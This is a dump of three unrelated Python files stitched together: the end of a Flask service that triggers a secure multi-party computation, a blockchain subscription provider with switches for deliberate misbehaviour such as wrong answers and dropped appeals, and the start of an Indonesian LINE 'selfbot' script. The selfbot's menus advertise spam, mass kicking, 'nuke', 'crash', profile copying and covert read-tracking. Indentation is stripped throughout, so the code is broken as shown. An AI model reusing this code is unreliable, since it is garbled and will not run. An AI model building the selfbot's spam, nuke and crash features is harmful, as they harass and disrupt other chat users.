class TriggerComputation(Resource):
def get(self, jobId, clients, datasetSize):
try:
generate_and_compile(str(clients), datasetSize)
p = Process(target=run_smpc_computation, args=(player_id, str(clients), jobId,))
p.start()
            # give the spawned computation a moment to start; if the process has
            # already exited (exitcode is set), treat the job as failed
            sleep(0.5)
            if p.exitcode is not None:
                raise ValueError
            return 200
except Exception as e:
print(e)
return 500
class Ping(Resource):
def get(self):
return 200
api.add_resource(Ping, '/api/ping')
api.add_resource(TriggerComputation, '/api/job-id/<jobId>/clients/<clients>/dataset-size/<datasetSize>')
if __name__ == '__main__':
app.run(debug=True, port=7100+player_id, host="0.0.0.0")
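# Example usage (a sketch; the job id, client count and dataset size below are
# placeholder values, not ones defined by this service):
#   python player.py 0
#   curl http://localhost:7100/api/ping
#   curl http://localhost:7100/api/job-id/job42/clients/3/dataset-size/100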
|
provider.py
|
import web3
import time
import eth_account.messages
import web3.contract
import sys
import socket
from threading import Thread, Lock
from lib import *
from Simple import *
from SimpleValidator import *
import json
from lib import w3
import traceback
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 29290 # Port to listen on (non-privileged ports are > 1023)
class ProviderInterface: # This class is intended for the provider to interact with the blockchain.
# It doesn't do any computing itself, and doesn't interact with the customers.
def __init__(self, address, _max_queries=0):
validator_address = Solver.init_validator(address)
self.provider = Provider(address, validator_address)
self._terminate = False
self.customers = []
self.unsolved_questions = {}
self.unsolved_stack = []
self.solved_questions = {}
self.done_questions = {}
self.urgent = []
self.latest_signature = None
self.latest_hashes = []
self.latest_unanswered = 0
self.customers_demanded = []
self.latest_ack = dict()
self.acks = dict()
self.max_queries = _max_queries
def get_active_customers(self):
customers = []
for c in self.provider.get_customers():
if self.provider.is_subscription_active(c):
customers.append(c)
return customers
def check_signature(self, customer_address, ack):
questions_hashes, unanswered, signature = ack.get_all()
return Signer.check_sig(questions_hashes, unanswered, self.provider.get_contract_address(customer_address), signature, customer_address)
def demand_signature(self, customer_address, question, answer):
#questions_hashes, unanswered, signature = [], 0, 0
if customer_address in self.customers_demanded:
print(shorten_addr(customer_address), "Tried demanding signature - but already demanding.")
return False
ack = self.latest_ack[customer_address]
if ack is None:
print(shorten_addr(customer_address), "Tried demanding signature - no valid ack.")
return False
self.customers_demanded.append(customer_address)
questions_hashes, unanswered, signature = ack.get_all()
demanded = self.provider.demand_signature(customer_address, question, questions_hashes, unanswered, signature, answer)
if demanded:
print(shorten_addr(customer_address), "Demanded signature.")
else:
print(shorten_addr(customer_address), "Tried demanding signature - failed.")
return demanded
def demand_all(self):
demanded = []
for address in self.get_active_customers():
if address in self.customers_demanded:
continue
if self.latest_ack[address] is not None and 0 < len(self.solved_questions[address].keys()):
qa = self.solved_questions[address][list(self.solved_questions[address].keys())[0]]
if self.demand_signature(address, qa.get_question(), qa.get_answer()):
demanded.append(address)
return demanded
def exec_demands(self):
to_remove = []
for address in self.customers_demanded:
closed = self.provider.exec_demand(address)
if closed:
to_remove.append(address)
for address in to_remove:
self.customers_demanded.remove(address)
return to_remove
def check_demands(self):
to_remove = []
for address in self.customers_demanded:
ret = self.provider.check_demand(address)
if ret is not None:
hashes, unanswered, signature = ret
closed = self.register_ack(address, Ack(hashes, unanswered, signature))
if closed is not None:
for q in closed:
print(shorten_addr(address), "Got new answer ack:", Coder.str_question(q))
to_remove.append(address)
for address in to_remove:
self.customers_demanded.remove(address)
return to_remove
def get_different_ack(self, customer_address, ack):
if not self.check_signature(customer_address, ack):
return None
for ack2 in self.acks[customer_address]:
if ack.is_different(ack2):
return ack2
self.acks[customer_address].append(ack)
return None
def register_ack(self, customer_address, ack):
#print(customer_address, hashes, unanswered, signature)
        if len(ack.get_hashes()) < 1:
return None
if not self.check_signature(customer_address, ack):
return None
if ack.is_newer_than(self.latest_ack[customer_address]):
self.latest_ack[customer_address] = ack
to_close = []
for h in ack.get_answered_hashes():
if h in self.solved_questions[customer_address]:
to_close.append(self.solved_questions[customer_address][h].get_question())
if h in self.unsolved_questions[customer_address]:
                    to_close.append(self.unsolved_questions[customer_address][h].get_question())
for q in to_close:
self.close_question(customer_address, q)
return to_close
elif ack.is_different(self.latest_ack[customer_address]):
self.acks[customer_address].append(ack)
return None
def set_urgent(self, appeals):
self.urgent = appeals
def get_urgent(self):
return self.urgent
def get_next_question(self):
if len(self.unsolved_stack) < 1:
return None
return self.unsolved_stack[0]
def create_subscription(self, customer_address):
self.customers.append(customer_address)
self.unsolved_questions[customer_address] = dict()
self.solved_questions[customer_address] = dict()
self.done_questions[customer_address] = dict()
self.acks[customer_address] = dict()
self.latest_ack[customer_address] = None
return self.provider.create_subscription(customer_address)
def register_question(self, customer_address, question):
if not self.provider.get_validator().is_valid_question(question):
return False
qa = QA(question, asker = customer_address)
self.unsolved_questions[customer_address][qa.get_hash()] = qa
self.unsolved_stack.append(qa)
return True
def register_answer(self, customer_address, question, answer):
q_hash = Signer.hash(question)
qa = None
if q_hash in self.unsolved_questions[customer_address]:
qa = self.unsolved_questions[customer_address][q_hash]
self.unsolved_stack.remove(qa)
qa.set_answer(answer)
del self.unsolved_questions[customer_address][q_hash]
if qa is None:
qa = QA(question, asker=customer_address, answer=answer)
self.solved_questions[customer_address][q_hash] = qa
def close_question(self, customer_address, question):
q_hash = Signer.hash(question)
qa = None
if q_hash in self.unsolved_questions[customer_address]:
qa = self.unsolved_questions[customer_address][q_hash]
self.unsolved_stack.remove(qa)
del self.unsolved_questions[customer_address][q_hash]
if q_hash in self.solved_questions[customer_address]:
qa = self.solved_questions[customer_address][q_hash]
del self.solved_questions[customer_address][q_hash]
if qa is None:
qa = QA(question, asker=customer_address)
self.done_questions[customer_address][q_hash] = qa
def get_new_answers(self, customer_address, close=True):
return self.solved_questions[customer_address].values()
def is_subscription_active(self, customer_address):
return self.provider.is_subscription_active(customer_address)
def is_appealing(self, customer_address):
return self.provider.check_for_appeal(customer_address) is not None
def get_answer(self, customer_address, question):
q_hash = Signer.hash(question)
answer = None
if q_hash in self.solved_questions[customer_address]:
answer = self.solved_questions[customer_address][q_hash].get_answer()
elif q_hash in self.done_questions[customer_address]:
answer = self.done_questions[customer_address][q_hash].get_answer()
return answer
def check_for_appeals(self):
        # returns the list of appeals currently pending from active customers
appeals = []
for address in self.get_active_customers():
appeal = self.provider.check_for_appeal(address)
if(appeal is not None):
appeals.append(appeal)
closed = self.register_ack(address, appeal.get_ack())
                if closed is not None:
                    for q in closed:
                        print(shorten_addr(address), "Got new answer ack:", Coder.str_question(q))
return appeals
def resolve_appeal(self, customer_address, appeal):
# submit answer to resolve appeal by the specified customer
if self.overflow(customer_address):
print(shorten_addr(customer_address), "dismissed appeal - max queries met")
return True
question = appeal.get_question()
q_hash = Signer.hash(question)
answer = self.get_answer(customer_address, question)
if answer is not None:
self.provider.resolve_appeal(customer_address, answer)
return True
if q_hash not in self.unsolved_questions[customer_address]:
self.register_question(customer_address, question)
return False
def can_overflow(self, customer_address):
if self.latest_ack[customer_address] is None:
return False
if self.max_queries == 0:
return False
questions_hashes, unanswered, signature = self.latest_ack[customer_address].get_all()
        if len(questions_hashes) - unanswered <= self.max_queries:
return False
return True
def overflow(self, customer_address):
if not self.can_overflow(customer_address):
return False
questions_hashes, unanswered, signature = self.latest_ack[customer_address].get_all()
try:
self.provider.overflow(customer_address, questions_hashes, unanswered, signature)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
return False
print(shorten_addr(customer_address), "Overflow: closed contract")
return True
def withdraw(self, customer_address):
# withdraws money from the subscription of the specified customer
return self.provider.withdraw(customer_address)
def withdraw_all(self):
amount = 0
        # withdraws money from the subscriptions of all customers
for customer_address in self.provider.get_customers():
amount += self.withdraw(customer_address)
return amount
def terminate(self):
self._terminate = True
def terminated(self):
return self._terminate
def shorten_addr(addr):
s = str(addr)
if len(s) < 8:
s += "-"*(8-len(s))
return "[" + s[:7] + "]"
def init_provider(address, host, port):
provider_int = None
# Get Behavior of Provider from user
PROVIDER_APPEAL_ONLY = True
PROVIDER_WAIT_APPEAL = False
PROVIDER_DROP_APPEAL = False
PROVIDER_WRONG_ANSWER = False
PROVIDER_IMMIDIEATE_DEMAND = False
STOP_ON_MAX = False
value = input("Should the provider send answers? (y/n):")
if value == "y":
PROVIDER_APPEAL_ONLY = False
value = input("Should the provider wait for the last minute with appeals? (y/n):")
if value == "y":
PROVIDER_WAIT_APPEAL = True
value = input("Should the provider drop appeals? (y/n):")
if value == "y":
PROVIDER_DROP_APPEAL = True
value = input("Should the provider provide wrong answers (in appeals also)? (y/n):")
if value == "y":
PROVIDER_WRONG_ANSWER = True
value = input("Should the provider demand a signature for every answer? (y/n):")
if value == "y":
PROVIDER_IMMIDIEATE_DEMAND = True
value = input("Should the provider stop answering when max queries met? (y/n):")
if value == "y":
STOP_ON_MAX = True
global MAX_QUERIES
if not STOP_ON_MAX:
MAX_QUERIES = 0
# Create all threads
provider_int = ProviderInterface(address, MAX_QUERIES)
provider_lock = Lock()
to_join = []
x = Thread(target=handle_appeals_provider, args=(provider_lock, provider_int, PROVIDER_WAIT_APPEAL, PROVIDER_DROP_APPEAL))
x.start()
to_join.append(x)
x = Thread(target=solve_provider, args=(provider_lock, provider_int, Solver.solve, PROVIDER_WRONG_ANSWER, PROVIDER_IMMIDIEATE_DEMAND))
x.start()
to_join.append(x)
x = Thread(target=handle_input_provider, args=(provider_lock, provider_int))
x.start()
to_join.append(x)
# Receive connections
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((host, port))
s.listen()
print("[x] Started listening: ", (host, port))
s.settimeout(1)
while True:
try:
conn, addr = s.accept()
except socket.timeout:
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
break
else:
x = Thread(target=provider_handle_client, args=(provider_lock, provider_int, conn, addr, PROVIDER_APPEAL_ONLY, STOP_ON_MAX))
x.start()
to_join.append(x)
for x in to_join:
x.join()
s.close()
print("[x] Closing server")
def handle_appeals_provider(provider_lock, provider_int, PROVIDER_WAIT_APPEAL, PROVIDER_DROP_APPEAL):
#main logic of provider
while(True):
#Check if provider terminated
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
print("[x] Closing appeals provider")
return
time.sleep(0.1)
# Check for all appeals
appeals = []
provider_lock.acquire()
try:
appeals = provider_int.check_for_appeals()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if PROVIDER_DROP_APPEAL:
appeals = []
# Resolve every appeal if able
unresolved = []
for appeal in appeals:
customer_address = appeal.get_customer_address()
deadline_block, question = appeal.get_end_of_service_block(), appeal.get_question()
if PROVIDER_WAIT_APPEAL and w3.eth.blockNumber < deadline_block - 2:
continue
            resolved = False
            provider_lock.acquire()
try:
resolved = provider_int.resolve_appeal(customer_address, appeal)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
print(shorten_addr(customer_address), "Couldn't resolve appeal! Is answer incorrect?")
finally:
provider_lock.release()
if resolved:
print(shorten_addr(customer_address), "Resolved appeal")
else:
print(shorten_addr(customer_address), "Appealed an unsent question")
unresolved.append(appeal)
# Set unresolved appeals to urgent
provider_lock.acquire()
try:
            provider_int.set_urgent(unresolved)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
# Check for status of demands
solved = []
provider_lock.acquire()
try:
solved = provider_int.check_demands()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
for address in solved:
print(shorten_addr(address), "Has resolved the signature demand")
# Execute unresolved timed demands
solved = []
provider_lock.acquire()
try:
solved = provider_int.exec_demands()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
for address in solved:
print(shorten_addr(address), "Channel closed - demand not resolved")
# Try withdrawing funds
if w3.eth.blockNumber % 10 == 0:
amount = 0
provider_lock.acquire()
try:
amount = provider_int.withdraw_all()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if amount > 0:
print("Withdrew funds:", amount)
def solve_provider(provider_lock, provider_int, solver, PROVIDER_WRONG_ANSWER, PROVIDER_IMMIDIEATE_DEMAND):
solved_counter = 0
while True:
# Check if Provider terminated
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
print("[x] Closing solve provider")
return
time.sleep(0.1)
# Get Urgent to Solve
urgent = []
question = None
customer_address = None
provider_lock.acquire()
try:
urgent = provider_int.get_urgent()
qa = provider_int.get_next_question()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if qa is not None:
customer_address = qa.get_asker()
question = qa.get_question()
# Get most Urgent Question
if len(urgent) > 0:
closest = urgent[0].get_end_of_service_block()
for appeal in urgent:
add = appeal.get_customer_address()
deadline_block, q = appeal.get_end_of_service_block(), appeal.get_question()
if deadline_block < closest:
customer_address = add
question = q
closest = deadline_block
# Sleep if no question to solve
if question is None:
time.sleep(0.5)
continue
# Solve most recent or urgent
answer = solver(question, wrong=PROVIDER_WRONG_ANSWER)
print(shorten_addr(customer_address), "Solved:", Coder.str_question(question), "->", Coder.str_answer(answer))
provider_lock.acquire()
try:
provider_int.register_answer(customer_address, question, answer)
if(PROVIDER_IMMIDIEATE_DEMAND):
provider_int.demand_signature(customer_address, question, answer)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
def handle_input_provider(provider_lock, provider_int):
while(True):
value = input("")
if value == "q":
provider_lock.acquire()
try:
provider_int.terminate()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
print("[x] Closing input provider")
return
elif value == "demand":
ret = None
provider_lock.acquire()
try:
ret = provider_int.demand_all()
except Exception as e:
print("ERROR demand:",e)
finally:
provider_lock.release()
print("[x] Demanded", len(ret), "signatures")
for a in ret:
print(shorten_addr(a), "Demanded signature")
else:
print("[x] Unknown command:", value)
def provider_handle_client(provider_lock, provider_int, conn, addr, PROVIDER_APPEAL_ONLY, STOP_ON_MAX):
customer_address = 0x000000000
state = 0
with conn:
conn.settimeout(1)
print(shorten_addr(customer_address), "New Connection: ", addr)
state = 0
# Getting Address
while True:
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
conn.close()
print(shorten_addr(customer_address), "Closing connection", addr)
return
try:
msg = receive_dict(conn)
if msg is None:
break
except:
continue
# get next message
if state == 0:
#print(addr, "Received: " + str(msg))
if not msg:
print(addr, "ERROR: connection ended?")
return
if "type" in msg and msg["type"] == "address" and "address" in msg:
customer_address = msg["address"]
print(shorten_addr(customer_address), "Got Address. (" + str(addr) + ")")
# Creating contract and sending it:
sub_add = None
provider_lock.acquire()
try:
sub_add = provider_int.create_subscription(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if not sub_add:
print(shorten_addr(customer_address), "No subscription address! Returning.")
return
print(shorten_addr(customer_address), "Sending subscription...")
send_dict(conn,{
"type": "subscription",
"address": sub_add
})
state = 1
print(shorten_addr(customer_address), "Waiting for msg")
continue
# Getting questions and sending answers
if state == 1:
active = True
provider_lock.acquire()
try:
active = provider_int.is_subscription_active(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if not active:
print(shorten_addr(customer_address), "Subscription no longer active.")
conn.close()
print(shorten_addr(customer_address), "Closing connection", addr)
return
provider_lock.acquire()
try:
demanding = customer_address in provider_int.customers_demanded
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if demanding:
continue
# Dismiss Broken Messages
if not msg:
break
if "type" not in msg:
continue
# Handle Msgs by Types
elif msg["type"] == "new_question":
# Decode Message
question = Coder.stream_to_encoded(msg["question"])
hashes = str_to_bytes(msg["hashes"])
unanswered = msg["unanswered"]
signature = str_to_bytes(msg["signature"])
print(shorten_addr(customer_address), "Got new question:", Coder.str_question(question))
# Register Ack
closed = []
provider_lock.acquire()
try:
closed = provider_int.register_ack(customer_address, Ack(hashes, unanswered, signature))
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if closed is None:
print(shorten_addr(customer_address), "Invalid ack! Ignoring.")
continue
for q in closed:
print(shorten_addr(customer_address), "Got new answer ack:", Coder.str_question(q))
# Check for Overflow
overflow = False
provider_lock.acquire()
try:
overflow = provider_int.can_overflow(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if overflow:
print(shorten_addr(customer_address), "Max queries met! Ignoring.")
continue
#Register Question
qa = QA(question)
h = qa.get_hash()
if h not in hashes:
print(shorten_addr(customer_address), "Question not in hashes! Ignoring.")
ret = False
provider_lock.acquire()
try:
ret = provider_int.register_question(customer_address, question)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if not ret:
print(shorten_addr(customer_address), "Invalid question! Ignoring.")
elif msg["type"] == "ack":
# Decode Msg
hashes = str_to_bytes(msg["hashes"])
unanswered = msg["unanswered"]
signature = str_to_bytes(msg["signature"])
# Register Ack
closed = []
provider_lock.acquire()
try:
closed = provider_int.register_ack(customer_address, Ack(hashes, unanswered, signature))
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if closed is None:
print(shorten_addr(customer_address), "Got useless ack...")
elif len(closed) < 1:
print(shorten_addr(customer_address), "Got stale ack")
else:
for q in closed:
print(shorten_addr(customer_address), "Got new answer ack:", Coder.str_question(q))
elif msg["type"] == "send_answer":
# Check if specific question needed (currently useless)
question = None
if "question" in msg:
question = Coder.stream_to_encoded(msg["question"])
q = question
if q is not None:
q = Coder.str_question(q)
print(shorten_addr(customer_address), "Asking for new answers, prefered question:", q)
# Get all qas
qas = []
provider_lock.acquire()
try:
qas = provider_int.get_new_answers(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
# Send all answers
questions = [Coder.encoded_to_stream(qa.get_question()) for qa in qas]
answers = [Coder.encoded_to_stream(qa.get_answer()) for qa in qas]
#print(shorten_addr(customer_address), "Almost sent answers:", len(answers))
if PROVIDER_APPEAL_ONLY:
questions = answers = []
send_dict(conn, {
"type": "answer",
"questions": questions,
"answers": answers
})
print(shorten_addr(customer_address), "Sent answers:", len(answers))
else:
print(shorten_addr(customer_address), "??? Received: " + str(msg))
print(shorten_addr(customer_address), "Ended Connection.")
if __name__ == '__main__':
#print(sys.argv)
#print(len(sys.argv))
if(len(sys.argv) < 2):
print("USAGE: <filename> address [port]")
sys.exit()
address = sys.argv[1]
port = PORT
if(len(sys.argv) > 2):
port = int(sys.argv[2])
from main import HOST
init_provider(address, HOST, port)
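# Example invocation (sketch): the first argument is the provider's on-chain account
# address (a placeholder below); the optional second argument overrides the default port.
#   python provider.py 0xYourProviderAddress 29290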
|
Dhipublik.py
|
# -*- coding: utf-8 -*-
import Adhi
from Adhi.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile, shutil
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
#from gtts import gTTS
from googletrans import Translator
cl = Adhi.LINE()
#cl.login(qr=True)
cl.login(token='isi anu')#ranita
cl.loginResult()#
kc = kl = cl
satpam = kk = ki = kt = cl
print "════n/SUKSES BOSS\n════"
reload(sys)
sys.setdefaultencoding('utf-8')
#album = None
#image_path = 'tmp/tmp.jpg'
helpMessage ="""
╔═════════════
║ TEAM BOT ADHI
╠═════════════
|Key1
║|Key2
║|Key3
║|Say (txt)
║|Kr say (text)
|Apakah (text)
║|Kapan (txt)
║|welcome
║|.. (text)
║|Time
║|rate @
║|Gcreator
║|Creator
║|Spam on (jml) (Text)
║|image
║|ig
║|youtube
║|lirik
║|music
║|zodiAK
║|Mimic
║|Getcover @
║|Tag on/off
║|Getpp @
║|Getinfo @
║|Getinfo2
║|Njoin on/off
║|Nleave on/off
║|setview
║|viewseen
║|CCtv
║|Intip
║|Crot (tagall)
║|Absen
║|Gift
║|ranita pergi (ngeluarkan bot)
║|Kr pergi (ngeluarkan bot)
║╚════════════
║ UNTUK PUBLIK
║ SILAHKAN GUNAKAN
╚═════════════
"""
protectMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡⚡➣qr on/oғғ
║╠❂͜͡⚡➣gυeѕт on/oғғ
║╠❂͜͡⚡➣мeмвer on/oғғ
║╠❂͜͡⚡➣groυp on/oғғ
║╠❂͜͡⚡➣ĸιcĸ on/oғғ
║╠❂͜͡⚡➣cancel on/oғғ
║╚════════════
╚═════════════
"""
socmedMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣wιĸι [тeхт]
║╠❂͜͡🌟➣ιg [тeхт]
║╠❂͜͡🌟➣ιмage [тeхт]
║╠❂͜͡🌟➣vιdeo [тeхт]
║╠❂͜͡🌟➣zodιaĸ [тeхт]
║╠❂͜͡🌟➣yoυтυвe [тeхт]
║╠❂͜͡🌟➣lιrιĸ [тeхт]
║╠❂͜͡🌟➣ιdlιne [тeхт]
║╠❂͜͡🌟➣мυѕιc [тeхт]
║╠❂͜͡🌟➣тιмe [тιмe]
║╠❂͜͡🌟➣ѕay [тeхт]
║╚════════════
╚═════════════
"""
translateMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠☔тr-ιd = ιndoneѕιa
║╠☔тr-мy = мyanмar
║╠☔тr-en = englιѕн
║╠☔тr-тн = тнaιland
║╠☔тr-ja = japaneѕe
║╠☔тr-мѕ = мalayѕιa
║╠☔тr-ιт = ιтalιan
║╠☔тr-тr = тυrĸιѕн
║╠☔тr-aғ = aғrιĸaanѕ
║╠☔тr-ѕq = alвanιan
║╠☔тr-aм = aмнarιc
║╠☔тr-ar = araвιc
║╠☔тr-нy = arмenιan
║╚════════════
╚═════════════
"""
botMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡⚡➣nĸ [naмe]
║╠❂͜͡⚡➣vĸ [naмe]
║╠❂͜͡⚡➣nυĸe
║╠❂͜͡⚡➣lυrĸιng > Cctv
║╠❂͜͡⚡➣тeѕ
║╠❂͜͡⚡➣reѕpon
║╠❂͜͡⚡➣ѕpeed
║╠❂͜͡⚡➣glιѕт
║╠❂͜͡⚡➣тagall/Crot
║╠❂͜͡⚡➣reѕтarт
║╠❂͜͡⚡➣cn [тeхт]
║╠❂͜͡⚡➣cѕ [тeхт]
║╠❂͜͡⚡➣мe
║╠❂͜͡⚡➣craѕн
║╚════════════
╚═════════════
"""
settingMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣ѕeт
║╠❂͜͡🌟➣тag on/oғғ
║╠❂͜͡🌟➣тag2 on/oғғ
║╠❂͜͡🌟➣aυтolιĸe on/oғғ
║╠❂͜͡🌟➣add on/oғғ
║╠❂͜͡🌟➣joιn on/oғғ
║╠❂͜͡🌟➣ѕнare on/oғғ
║╠❂͜͡🌟➣coммenт on/oғғ
║╠❂͜͡🌟➣ĸ on/oғғ
║╠❂͜͡🌟➣njoιn on/oғғ
║╠❂͜͡🌟➣nleave on/oғғ
║╚════════════
╚═════════════
"""
giftMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣gιғт
║╠❂͜͡🌟➣gιғт 1
║╠❂͜͡🌟➣gιғт 2
║╠❂͜͡🌟➣gιғт 3
║╚════════════
╚═════════════
"""
stealMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
║ line://ti/p/~krissthea
╠═════════════
║╔════════════
║╠❂͜͡🌟➣geтnaмe @
║╠❂͜͡🌟➣geтвιo @
║╠❂͜͡🌟➣geтιnғo @
║╠❂͜͡🌟➣geтpp @
║╠❂͜͡🌟➣geтcover @
║╠❂͜͡🌟➣geтмιd @
║╠❂͜͡🌟➣geтgroυp
║╠❂͜͡🌟➣ѕeтιмage [lιnĸ]
║╠❂͜͡🌟➣papιмage
║╠❂͜͡🌟➣ѕeтvιdeo [lιnĸ]
║╠❂͜͡🌟➣papvιdeo
║╠❂͜͡🌟➣мycopy @
║╠❂͜͡🌟➣мyвacĸυp
║╚════════════
╚═════════════
"""
KAC=[cl,ki,kk,kc,kl]
mid = cl.getProfile().mid
Smid = satpam.getProfile().mid
Amid = Bmid = Cmid = mid  # helper "bot" mids; every client above is the same account, so reuse the main mid
Bots=[mid]
owner=["mid lu",mid]
admin=["mid lu",mid]
baby=["mid rekan bot"]#chery/barby/ranita
creator=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
owner=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':False,
'timeline':False,
'autoAdd':True,
'message':"""👉😊☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\n\nby Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««""",
"lang":"JP",
"comment":"""👉😊☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\n\nby Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««""",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"QrProtect":False,
"MProtection":False,
"Protectguest":False,
"Protectcancel":False,
"autoKick":False,
"auto":True,
"tag":False,
"tag2":False,
"likeOn":False,
"Mimic":False,
"mimic":False,
"winvite":False,
"winvite2":False,
"Wc":False,
"Lv":False,
"pname":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"protectionOn":False,
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = cl.getProfile()
profile = cl.getProfile()
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
mulai = time.time()
agent = {'User-Agent' : "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"}
def translate(to_translate, to_language="auto", language="auto"):
bahasa_awal = "auto"
bahasa_tujuan = to_language
kata = to_translate
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
return result
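# Illustrative call (not from the original script): translate("selamat pagi", "en")
# fetches Google Translate's mobile page and returns the text of the first
# 'class="t0"' element, i.e. the translated string.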
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
        import urllib.request  # urllib library for extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers = headers)
            resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
